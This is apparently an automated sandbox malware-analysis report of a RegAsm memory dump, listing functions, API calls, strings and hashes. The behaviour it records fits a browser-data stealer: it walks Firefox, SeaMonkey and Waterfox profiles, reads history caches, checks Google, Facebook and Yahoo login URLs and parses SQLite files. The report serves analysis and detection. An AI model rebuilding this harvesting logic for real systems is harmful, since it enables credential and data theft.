Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: ??3@$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
String ID: $ContainerId$Container_%I64d$Containers$Name
API String ID: 3883404497-2982631422
Opcode ID: 366cc36c026cd150a239da38b4c6b1e2e10dbbf4b03b5b4663773bd365af82a7
Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
Opcode Fuzzy Hash: 366cc36c026cd150a239da38b4c6b1e2e10dbbf4b03b5b4663773bd365af82a7
Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99

Function 0040BB98 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 145
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
Part of subcall function 0040CC26: CloseHandle.KERNEL32(?), ref: 0040CC98

Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A

memset.MSVCRT ref: 0040BC75
memset.MSVCRT ref: 0040BC8C
WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
memcmp.MSVCRT ref: 0040BCD6
memcpy.MSVCRT ref: 0040BD2B
LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D

Strings

, xrefs: 0040BD19

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: memset$ByteCharCloseFileFreeHandleLocalMultiSizeWide_wcsicmpmemcmpmemcpy
String ID:
API String ID: 115830560-3916222277
Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99

Function 00412465 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 88
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 0041249C
??2@YAPAXI@Z.MSVCRT ref: 004124D2
??2@YAPAXI@Z.MSVCRT ref: 00412510
GetModuleHandleW.KERNEL32(00000000,0000000E), ref: 00412582
LoadIconW.USER32(00000000,00000065), ref: 0041258B
wcscpy.MSVCRT ref: 004125A0

Strings

r!A, xrefs: 00412477

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: ??2@$HandleIconLoadModulememsetwcscpy
String ID: r!A
API String ID: 2791114272-628097481
Opcode ID: e760b227a922d4e3f094a9eb3eb7a7fe7130a7247a75f8eef54ce2a40c46c596
Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
Opcode Fuzzy Hash: e760b227a922d4e3f094a9eb3eb7a7fe7130a7247a75f8eef54ce2a40c46c596
Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49

Function 0040C768 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 87
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1AE
Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1B6

Part of subcall function 0040AA04: ??3@YAXPAX@Z.MSVCRT ref: 0040AA0B

Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373

Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB

_wcslwr.MSVCRT ref: 0040C817

Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF

wcslen.MSVCRT ref: 0040C82C

Strings

/, xrefs: 0040C843
https://www.google.com/accounts/servicelogin, xrefs: 0040C7AA
/, xrefs: 0040C838
http://www.facebook.com/, xrefs: 0040C7B7
https://login.yahoo.com/config/login, xrefs: 0040C7C4

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: memset$??3@$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
API String ID: 62308376-4196376884
Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D

Function 0040B58D Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 60
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
FindResourceW.KERNEL32(00000000,00000032,BIN), ref: 0040B5B6
LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
LockResource.KERNEL32(00000000), ref: 0040B5DD
memcpy.MSVCRT ref: 0040B60D

Strings

BIN, xrefs: 0040B5AB

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
String ID: BIN
API String ID: 1668488027-1015027815
Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED

Function 00403C9C Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00403CBF
memset.MSVCRT ref: 00403CD4
memset.MSVCRT ref: 00403CE9
memset.MSVCRT ref: 00403CFE
memset.MSVCRT ref: 00403D13

Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68

Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC

Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55

Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242

memset.MSVCRT ref: 00403DDA

Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3

Strings

Waterfox\Profiles, xrefs: 00403D40, 00403D5B
Waterfox, xrefs: 00403D73

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
String ID: Waterfox$Waterfox\Profiles
API String ID: 4039892925-11920434
Opcode ID: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
Opcode Fuzzy Hash: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA

Function 00403E2D Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00403E50
memset.MSVCRT ref: 00403E65
memset.MSVCRT ref: 00403E7A
memset.MSVCRT ref: 00403E8F
memset.MSVCRT ref: 00403EA4

Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68

Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC

Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55

Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242

memset.MSVCRT ref: 00403F6B

Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3

Strings

Mozilla\SeaMonkey\Profiles, xrefs: 00403ED1, 00403EEC
Mozilla\SeaMonkey, xrefs: 00403F04

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
API String ID: 4039892925-2068335096
Opcode ID: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
Opcode Fuzzy Hash: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A

Function 00403FBE Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00403FE1
memset.MSVCRT ref: 00403FF6
memset.MSVCRT ref: 0040400B
memset.MSVCRT ref: 00404020
memset.MSVCRT ref: 00404035

Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68

Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC

Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55

Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242

memset.MSVCRT ref: 004040FC

Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3

Strings

Mozilla\Firefox, xrefs: 00404095
Mozilla\Firefox\Profiles, xrefs: 00404062, 0040407D

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
API String ID: 4039892925-3369679110
Opcode ID: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
Opcode Fuzzy Hash: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A

Function 00444432 Relevance: 10.7, APIs: 1, Strings: 6, Instructions: 217COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 004444E3

Strings

BINARY, xrefs: 0044454A, 0044454F, 0044455B, 00444567, 0044458C
main, xrefs: 00444613
temp, xrefs: 00444623
NOCASE, xrefs: 004445A4
RTRIM, xrefs: 00444573
no such vfs: %s, xrefs: 0044452B

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: memcpy
String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
API String ID: 3510742995-2641926074
Opcode ID: 94510af7901ecd36673df76512f8cc8f4b4749faf5a93beda853377b65ea3140
Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
Opcode Fuzzy Hash: 94510af7901ecd36673df76512f8cc8f4b4749faf5a93beda853377b65ea3140
Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99

Function 0041837F Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 140fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
GetLastError.KERNEL32 ref: 0041847E
??3@YAXPAX@Z.MSVCRT ref: 0041848B

Strings

|A, xrefs: 00418462

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: ??3@CreateErrorFileLast
String ID: |A
API String ID: 4200628931-1717621600
Opcode ID: b6fac9d43bc75127802d1a393ff5c3575377eb3b1acc0c55043375108e40dc75
Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
Opcode Fuzzy Hash: b6fac9d43bc75127802d1a393ff5c3575377eb3b1acc0c55043375108e40dc75
Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96

Function 004032B4 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 119COMMON

Download Yara Rule

APIs

Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A

Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA

memset.MSVCRT ref: 004033B7
memcpy.MSVCRT ref: 004033D0
wcscmp.MSVCRT ref: 004033FC
_wcsicmp.MSVCRT ref: 00403439

Strings

0.@, xrefs: 00403399
, xrefs: 004032DF

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: memset$??3@_wcsicmpmemcpywcscmpwcsrchr
String ID: $0.@
API String ID: 3030842498-1896041820
Opcode ID: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
Opcode Fuzzy Hash: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B

Function 00403BED Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 57COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00403C09
memset.MSVCRT ref: 00403C1E

Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68

Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732

wcscat.MSVCRT ref: 00403C47

Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC

wcscat.MSVCRT ref: 00403C70

Strings

Mozilla\Firefox\Profiles, xrefs: 00403C6A
Mozilla\Profiles, xrefs: 00403C41

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: memsetwcscat$CloseFolderPathSpecialwcscpywcslen
String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
API String ID: 1534475566-1174173950
Opcode ID: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
Opcode Fuzzy Hash: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9

Function 0040A804 Relevance: 9.0, APIs: 6, Instructions: 40libraryCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040A824
GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
wcscpy.MSVCRT ref: 0040A854
wcscat.MSVCRT ref: 0040A86A
LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
LoadLibraryW.KERNEL32(?), ref: 0040A884

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
String ID:
API String ID: 669240632-0
Opcode ID: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
Opcode Fuzzy Hash: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA

Function 00414C2E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 77registryCOMMON

Download Yara Rule

APIs

SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
memset.MSVCRT ref: 00414C87
RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
wcscpy.MSVCRT ref: 00414CFC

Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04

Strings

Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: CloseFolderPathSpecialVersionmemsetwcscpy
String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
API String ID: 2925649097-2036018995
Opcode ID: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
Opcode Fuzzy Hash: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE

Function 0041443E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

wcschr.MSVCRT ref: 00414458
_snwprintf.MSVCRT ref: 0041447D
WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3

Strings

"%s", xrefs: 0041446C

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: PrivateProfileString$Write_snwprintfwcschr
String ID: "%s"
API String ID: 1343145685-3297466227
Opcode ID: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
Opcode Fuzzy Hash: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58

Function 004087B3 Relevance: 7.7, APIs: 6, Instructions: 190COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004087D6

Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF

Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC

memset.MSVCRT ref: 00408828
memset.MSVCRT ref: 00408840
memset.MSVCRT ref: 00408858
memset.MSVCRT ref: 00408870
memset.MSVCRT ref: 00408888

Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55

Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
String ID:
API String ID: 2911713577-0
Opcode ID: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
Opcode Fuzzy Hash: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9

Function 0041F1A5 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 165COMMON

Download Yara Rule

APIs

memcmp.MSVCRT ref: 0041F202
memcmp.MSVCRT ref: 0041F22D
memcmp.MSVCRT ref: 0041F299

Strings

@ , xrefs: 0041F293
SQLite format 3, xrefs: 0041F220

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: memcmp
String ID: @ $SQLite format 3
API String ID: 1475443563-3708268960
Opcode ID: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
Opcode Fuzzy Hash: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88

Function 004110DC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 68COMMON

Download Yara Rule

APIs

_wcsicmp.MSVCRT ref: 004110FD
qsort.MSVCRT ref: 004111A7

Strings

/nosort, xrefs: 0041115D
/sort, xrefs: 004110F8

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: _wcsicmpqsort
String ID: /nosort$/sort
API String ID: 1579243037-1578091866
Opcode ID: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
Opcode Fuzzy Hash: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A

Function 00413CA4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 27timeCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
GetProcessTimes.KERNEL32(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2

Strings

kernel32.dll, xrefs: 00413CB0
GetProcessTimes, xrefs: 00413CBF

Memory Dump Source

Source File: 00000012.00000002.479067861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_RegAsm.jbxd

Similarity

API ID: HandleModuleProcessTimes
String ID: GetProcessTimes$kernel32.dll
API String ID: 116129598-3385500049
Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
